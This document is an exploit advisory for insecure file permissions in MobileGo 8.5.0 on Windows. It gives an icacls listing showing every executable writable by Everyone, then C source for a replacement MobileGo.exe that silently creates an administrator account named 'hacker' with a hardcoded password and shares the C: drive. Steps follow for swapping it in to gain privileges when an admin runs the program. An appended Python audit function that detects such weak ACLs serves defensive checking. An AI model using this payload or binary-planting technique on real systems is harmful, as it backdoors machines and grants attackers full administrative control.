# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-15
# Vendor Homepage : https://www.wondershare.net/
# Software Link: https://www.wondershare.net/mobilego/
# Tested on OS: Windows 7

# Proof of Concept (PoC):
==========================

C:\Program Files\Wondershare\MobileGo>icacls *.exe
adb.exe Everyone:(I)(F)
        AUTORITE NT\Système:(I)(F)
        BUILTIN\Administrateurs:(I)(F)
        BUILTIN\Utilisateurs:(I)(RX)

APKInstaller.exe Everyone:(I)(F)
                 AUTORITE NT\Système:(I)(F)
                 BUILTIN\Administrateurs:(I)(F)
                 BUILTIN\Utilisateurs:(I)(RX)

BsSndRpt.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

DriverInstall.exe Everyone:(I)(F)
                  AUTORITE NT\Système:(I)(F)
                  BUILTIN\Administrateurs:(I)(F)
                  BUILTIN\Utilisateurs:(I)(RX)

fastboot.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

FetchDriver.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)

MGNotification.exe Everyone:(I)(F)
                   AUTORITE NT\Système:(I)(F)
                   BUILTIN\Administrateurs:(I)(F)
                   BUILTIN\Utilisateurs:(I)(RX)

MobileGo.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

MobileGoService.exe Everyone:(I)(F)
                    AUTORITE NT\Système:(I)(F)
                    BUILTIN\Administrateurs:(I)(F)
                    BUILTIN\Utilisateurs:(I)(RX)

unins000.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

URLReqService.exe Everyone:(I)(F)
                  AUTORITE NT\Système:(I)(F)
                  BUILTIN\Administrateurs:(I)(F)
                  BUILTIN\Utilisateurs:(I)(RX)

WAFSetup.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

WsConverter.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)

WsMediaInfo.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)

#Exploit code(s):
=================

1) Compile the 'C' code below and name it "MobileGo.exe"

#include<windows.h>

int main(void){
 system("net user hacker abc123 /add");
 system("net localgroup Administrators hacker/add");
 system("net share SHARE_NAME=c:\ /grant:hacker,full");
 WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0);
return 0;
}

2) Rename the original "MobileGo.exe" to "~MobileGo.exe"
3) Place our malicious "MobileGo.exe" in the MobileGo directory
4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE.

Privilege escalation successful.
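
An audit check for the condition shown in the icacls listing above, added here as an example (not part of the original advisory): it parses icacls text output and reports every allow ACE that gives a broad group a right sufficient to modify or replace the file. The function name, the list of broad principals and the sample text are assumptions; the hardened.exe entry is constructed for contrast.

```python
import re

# Principals that include unprivileged users. icacls prints localized names,
# so the French form from the listing is included (assumed list, extend as needed).
BROAD = {"everyone", "builtin\\users", "builtin\\utilisateurs",
         "nt authority\\authenticated users"}
# icacls right codes that allow altering or replacing a file.
WRITE = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "GA", "GW"}
ACE = re.compile(r"^(.+?):((?:\([^)]+\))+)$")

def weak_aces(icacls_text):
    """Return sorted (file, principal, right) for allow ACEs that let a broad group modify the file."""
    findings = set()
    for block in re.split(r"\n\s*\n", icacls_text.strip("\n")):
        lines = [ln.rstrip() for ln in block.splitlines() if ln.strip()]
        if not lines:
            continue
        # Continuation lines are indented to the ACE column; with a single
        # line, fall back to the first space (file names with spaces unsupported).
        if len(lines) > 1:
            col = len(lines[1]) - len(lines[1].lstrip())
        else:
            col = lines[0].find(" ") + 1
        name = lines[0][:col].strip()
        for ace in [lines[0][col:]] + lines[1:]:
            m = ACE.match(ace.strip())
            if not m:
                continue  # e.g. the "Successfully processed" summary line
            flags = re.findall(r"\(([^)]+)\)", m.group(2))
            if "DENY" in flags or m.group(1).lower() not in BROAD:
                continue
            for right in flags[-1].split(","):  # last group holds the rights
                if right in WRITE:
                    findings.add((name, m.group(1), right))
    return sorted(findings)

# Constructed sample: two entries taken from the listing, one hardened entry invented.
SAMPLE = r"""
MobileGo.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

MobileGoService.exe Everyone:(I)(F)
                    BUILTIN\Utilisateurs:(I)(RX)

hardened.exe BUILTIN\Administrateurs:(F)
             BUILTIN\Utilisateurs:(RX)
"""
```

Because the (I) flag in the listing marks these ACEs as inherited, a finding on every executable points at the ACL of the installation directory rather than at the individual files.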